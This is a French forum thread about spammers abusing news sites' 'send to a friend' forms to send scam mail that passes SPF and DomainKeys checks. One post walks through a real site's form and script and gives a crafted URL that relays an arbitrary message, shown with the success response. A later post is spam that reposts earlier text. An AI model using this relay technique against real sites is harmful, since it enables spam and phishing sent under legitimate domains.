Sujet: Nouveau Botnet: Les sites de nouvelles!
01/07/2009 @ 11:43:23: rfr: Nouveau Botnet: Les sites de nouvelles!
Je ne sait pas s'il s'agit d'une tendance mondiale, mais elle se confirme dans ma boîte au lettre...

Depuis plusieurs jours, je reçois des scams en provenances de sites de news. Comment? Rien de plus simple, le scammer utilise la fonction "Envoyer cette nouvelle à un ami" du site pris en otage pour envoyer son scam.

C'est finement joué parce que:

SPF: Defeated (le mail est toujours envoyé d'où il faut comme il faut ...)
DomainKeys: Defeated (pareil ...)

Bref, ce sont toujours des envois qui "semblent" légitime et qui sont donc encore plus difficile à filtrer.

Il n'y a pas à dire, ces gens ont beaucoup d'imagination :tongue:

Et ça foncionne aussi sur informaticien.be ...

Alors vite, un capatcha sur l'envoi à un ami, vite!!!!
01/07/2009 @ 11:58:31: rfr: Nouveau Botnet: Les sites de nouvelles!
Bon, comme un petit exemple vaut mieux qu'on long discours, voyons comment exploiter cette faille ...

Prenons un site belge qui permet d'envoyer un article à un ... ami :tongue:

Regardons ... comment il fait:

Le formulaire:


<table width="100%" cellspacing="0" cellpadding="0" border="0" class="Text">

<form action="" onsubmit="STF(this);return false;">
<input type="hidden" name="sURL" value="">
<tr><td>
Votre email<br>
<input type="text" class="Text" name="sFROM" style="{width:200px;}"><br>
Votre prénom<br>
<input type="text" class="Text" name="sFIRSTNAME" style="{width:200px;}"><br>
Votre nom<br>

<input type="text" class="Text" name="sLASTNAME" style="{width:200px;}"><br>
Votre commentaire:<br>
<textarea class="Text" name="sCOMMENT" style="{width:200px;height:64px;}"></textarea><br>
<br>
Email de votre ami:<br>
<input type="text" class="Text" name="sTO" style="width:200px;"><br>
<br>
</td></tr>

<tr><td align="center">
<input type="submit" value="Envoyer">
</td></tr></form>
</table>




La fonction javascript STF:

[code]
function STF(oForm)
{
sURL = '' + document.location.href;

if(document.getElementById('ifr_cediti'))
{
if(sURL.indexOf('?') == -1) sURL += '?';
else sURL += '&';
sURL += 'mturl=' + CWS_URLEncode(document.getElementById('ifr_cediti').contentWindow.location);
}

sPostData = 'sURL=' + CWS_URLEncode(sURL);
sPostData += '&sFROM=' + CWS_URLEncode(oForm.sFROM.value);
sPostData += '&sTO=' + CWS_URLEncode(oForm.sTO.value);
sPostData += '&sCOMMENT=' + CWS_URLEncode(oForm.sCOMMENT.value);
sPostData += '&sLASTNAME=' + CWS_URLEncode(oForm.sLASTNAME.value);
sPostData += '&sFIRSTNAME=' + CWS_URLEncode(oForm.sFIRSTNAME.value);

CWS_HidePopup('fo_SendToFriend');

alert(CWS_HttpRequest('/Mediabel/pop_SendToFriend.aspx?LG=1', sPostData ));

return false;
}

[/quote]


Donc pour envoyer un email du site il suffit d'appeler l'URL comme suit:


http://www.HIDDENURL.be/Mediabel/pop_SendToFriend.aspx?LG=1&sURL=dude&sFROM=me&sTO=- rfr@bigscammer.be&sCOMMENT=I Love You&sFIRSTNAME=Dr&sLastName=Wilson


Et le résultat:


Votre commentaire à été envoyé à l'adresse E-mail suivante : rfr@bigscammer.be


On est pas dans la merdum ...
01/07/2009 @ 13:54:14: zion: Nouveau Botnet: Les sites de nouvelles!

Et ça foncionne aussi sur informaticien.be ...

Alors vite, un capatcha sur l'envoi à un ami, vite!!!!


Négatif, la fonction est réservée aux utilisateurs enregistrés, fonction sur laquelle il existe déjà un captcha.

Faut pas crier au loup comme ça hein :oh:

Sinon ça fait un bail que ces fonctions sont utilisées par des scripts, il y a des armées de spambots qui attaquent régulièrement tous les formulaires possibles, ce qui explique le captcha sur le formulaire de contact, le seul accessible sans connexion.
01/07/2009 @ 14:47:39: rfr: Nouveau Botnet: Les sites de nouvelles!


Négatif, la fonction est réservée aux utilisateurs enregistrés, fonction sur laquelle il existe déjà un captcha.

Faut pas crier au loup comme ça hein :oh:

Sinon ça fait un bail que ces fonctions sont utilisées par des scripts, il y a des armées de spambots qui attaquent régulièrement tous les formulaires possibles, ce qui explique le captcha sur le formulaire de contact, le seul accessible sans connexion.


Si je crée un compte et que j'utilise la fonction "Envoyé a un ami" sur une news, il n'y a pas de capatcha :tongue:
01/07/2009 @ 15:55:26: zion: Nouveau Botnet: Les sites de nouvelles!
Si on suit ta logique, alors il faut un captcha sur les privés, sur le forum, sur la shoutbox et sur toute interaction. La détection du bot se fait à l'inscription, point. C'est déjà assez pénalisant en terme de perte d'utilisateurs, faut pas non plus comparer cela à des autres pages qui n'ont aucun captcha sur l'emailing ni même d'obligation d'inscription. Et si il y a abus, le mec est banni, stout :oh:

De plus, pour en finir pour ma part, cette fonctionnalité n'a jamais été exploitée à mauvais escient, cela ne mérite donc pas les efforts "urgents" que tu cites :spamafote:

Sinon pour le débat de fond, clairement les spambots deviennent chaque jour de plus en plus sophistiqués et après avoir longtemps attaqué les mails (99% des mails sont des spams si je ne m'abuse :oh: ), le risque que ces bots ne pourrissent le contenu en ligne augmente de jour en jour :sweat:
18/03/2019 @ 10:08:22: : Nouveau Botnet: Les sites de nouvelles!
Je ne sait pas s'il s'agit d'une tendance mondiale, mais elle se confirme dans ma boîte au lettre...

Depuis plusieurs jours, je reçois des scams en provenances de sites de news. Comment? Rien de plus simple, le scammer utilise la fonction "Envoyer cette nouvelle à un ami" du site pris en otage pour envoyer son scam.

C'est finement joué parce que:

SPF: Defeated (le mail est toujours envoyé d'où il faut comme il faut ...)
DomainKeys: Defeated (pareil ...)

Bref, ce sont toujours des envois qui "semblent" légitime et qui sont donc encore plus difficile à filtrer.

Il n'y a pas à dire, ces gens ont Mobdro beaucoup d'imagination :tongue:

Et ça foncionne aussi sur informaticien.be ...

Alors vite, un capatcha sur l'envoi à un ami, vite!!!!


Si on suit ta logique, alors il faut un captcha sur les privés, sur le forum, sur la shoutbox et sur toute interaction. La détection du bot se fait à l'inscription, point. C'est déjà assez pénalisant en terme de perte d'utilisateurs, faut pas non plus comparer cela à des autres pages qui n'ont aucun captcha sur l'emailing ni même d'obligation d'inscription. Et si il y a abus, le mec est banni, stout :oh:
18/03/2019 @ 12:27:02: ovh: Nouveau Botnet: Les sites de nouvelles!
10 ans de déterrage :ciler:

Est-ce le record ? :figti:
Retour